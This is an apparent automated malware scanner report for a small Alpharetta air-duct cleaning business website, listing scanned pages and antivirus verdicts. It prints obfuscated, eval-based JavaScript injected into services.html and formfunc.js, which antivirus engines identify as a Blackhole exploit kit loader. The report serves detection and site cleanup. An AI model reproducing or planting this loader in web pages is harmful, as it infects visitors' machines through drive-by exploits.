New scan:

Malware Scanner report for jjairductcleaningalpharetta.com

Malicious/Suspicious/Total urls checked
2/8/15
10 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://jjairductcleaningalpharetta.com/
200 OK
Content-Length: 12992
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript"></script>

http://jjairductcleaningalpharetta.com/script/jquery.js
200 OK
Content-Length: 57254
Content-Type: application/javascript
clean
http://jjairductcleaningalpharetta.com/script/ui_core.js
200 OK
Content-Length: 12011
Content-Type: application/javascript
clean
http://jjairductcleaningalpharetta.com/script/ui_tabs.js
200 OK
Content-Length: 16572
Content-Type: application/javascript
clean
http://jjairductcleaningalpharetta.com/script/lightbox.js
200 OK
Content-Length: 19604
Content-Type: application/javascript
clean
http://jjairductcleaningalpharetta.com/index.html
200 OK
Content-Length: 12992
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript"></script>

http://jjairductcleaningalpharetta.com/aboutus.html
200 OK
Content-Length: 12152
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript"></script>

http://jjairductcleaningalpharetta.com/services.html
200 OK
Content-Length: 17371
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c(
...[4153 bytes skipped]...

Antivirus reports:

AntiVir
JS/Blacole.EB.152
Avast
JS:Decode-BKU [Trj]
Ad-Aware
JS:Exploit.BlackHole.PG
Bkav
MW.Cloda16.Trojan.e34a
Ikarus
Exploit.JS.Blacole
nProtect
JS:Exploit.BlackHole.PG
TrendMicro-HouseCall
TROJ_GEN.F47V1031
Comodo
UnclassifiedMalware
Emsisoft
JS:Exploit.BlackHole.PG (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
Microsoft
Exploit:JS/Blacole.OF
MicroWorld-eScan
JS:Exploit.BlackHole.PG
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
VIPRE
Exploit.JS.Blacole.of (v)
AVG
JS/Exploit
Norman
Blacole.XD
GData
JS:Exploit.BlackHole.PG
BitDefender
JS:Exploit.BlackHole.PG

http://jjairductcleaningalpharetta.com/alpharetta-airductcleaning.html
200 OK
Content-Length: 15720
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript"></script>

http://jjairductcleaningalpharetta.com/alpharetta-dryerventcleaning.html
200 OK
Content-Length: 13915
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript"></script>

http://jjairductcleaningalpharetta.com/alpharetta-chimneysweep.html
200 OK
Content-Length: 12194
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript"></script>

http://jjairductcleaningalpharetta.com/alpharetta-coupons.html
200 OK
Content-Length: 13449
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript"></script>

http://jjairductcleaningalpharetta.com/contactus.html
200 OK
Content-Length: 13580
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript"></script>

http://jjairductcleaningalpharetta.com/script/jquery-1.2.6.min.js
200 OK
Content-Length: 55774
Content-Type: application/javascript
clean
http://jjairductcleaningalpharetta.com/script/formfunc.js
200 OK
Content-Length: 9869
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

lnh="y";jote="document";try{+function(){if(document.querySelector)--(window[jote].getElementById("asd"))}()}catch(tunjcl){rll=function(cuf){cuf="fro"+cuf;for(airzoc=0;airzoc<lnh.length;airzoc++){rcov+=String[cuf](lqhb(vcbz+(lnh[airzoc]))-(79));}};};lqhb=eval;vcbz="0x";snoy=0;if(!snoy){try{++lqhb(jote).body}catch(tunjcl){yfr="(";}lnh="6f(b5(c4(bd(b2(c3(b8(be(bd(6f(b1(b8(b8(b4(7f(88(77(78(6f(ca(5c(59(6f(c5(b0(c1(6f(c2(c3(b0(c3(b8(b2(8c(76(b0(b9(b0(c7(76(8a(5c(59(6f(c5(b0(c1(6f(b2(be(bd(c3(c1(be
... 3618 bytes are skipped ...
(6f(bb(b4(bd(7b(6f(b4(bd(b3(6f(78(6f(78(8a(5c(59(cc(5c(59(b8(b5(6f(77(bd(b0(c5(b8(b6(b0(c3(be(c1(7d(b2(be(be(ba(b8(b4(94(bd(b0(b1(bb(b4(b3(78(5c(59(ca(5c(59(b8(b5(77(96(b4(c3(92(be(be(ba(b8(b4(77(76(c5(b8(c2(b8(c3(b4(b3(ae(c4(c0(76(78(8c(8c(84(84(78(ca(cc(b4(bb(c2(b4(ca(a2(b4(c3(92(be(be(ba(b8(b4(77(76(c5(b8(c2(b8(c3(b4(b3(ae(c4(c0(76(7b(6f(76(84(84(76(7b(6f(76(80(76(7b(6f(76(7e(76(78(8a(5c(59(5c(59(b1(b8(b8(b4(7f(88(77(78(8a(5c(59(cc(5c(59(cc".split(yfr);rcov="";rll("mCharCode");lqhb(""+rcov);}

Antivirus reports:

AntiVir
JS/Blacole.EB.152
Avast
JS:Decode-BKU [Trj]
Ad-Aware
JS:Exploit.BlackHole.PG
Bkav
MW.Cloda16.Trojan.e34a
Ikarus
Exploit.JS.Blacole
nProtect
JS:Exploit.BlackHole.PG
TrendMicro-HouseCall
TROJ_GEN.F47V1031
Comodo
UnclassifiedMalware
Emsisoft
JS:Exploit.BlackHole.PG (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
Microsoft
Exploit:JS/Blacole.OF
MicroWorld-eScan
JS:Exploit.BlackHole.PG
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
VIPRE
Exploit.JS.Blacole.of (v)
AVG
JS/Exploit
Norman
Blacole.XD
GData
JS:Exploit.BlackHole.PG
BitDefender
JS:Exploit.BlackHole.PG


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jjairductcleaningalpharetta.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 19:01:09 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 12992
Content-Type: text/html

...12992 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jjairductcleaningalpharetta.com
Referer: http://www.google.com/search?q=jjairductcleaningalpharetta.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jjairductcleaningalpharetta.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jjairductcleaningalpharetta.com/

Result: jjairductcleaningalpharetta.com is not infected or malware details are not published yet.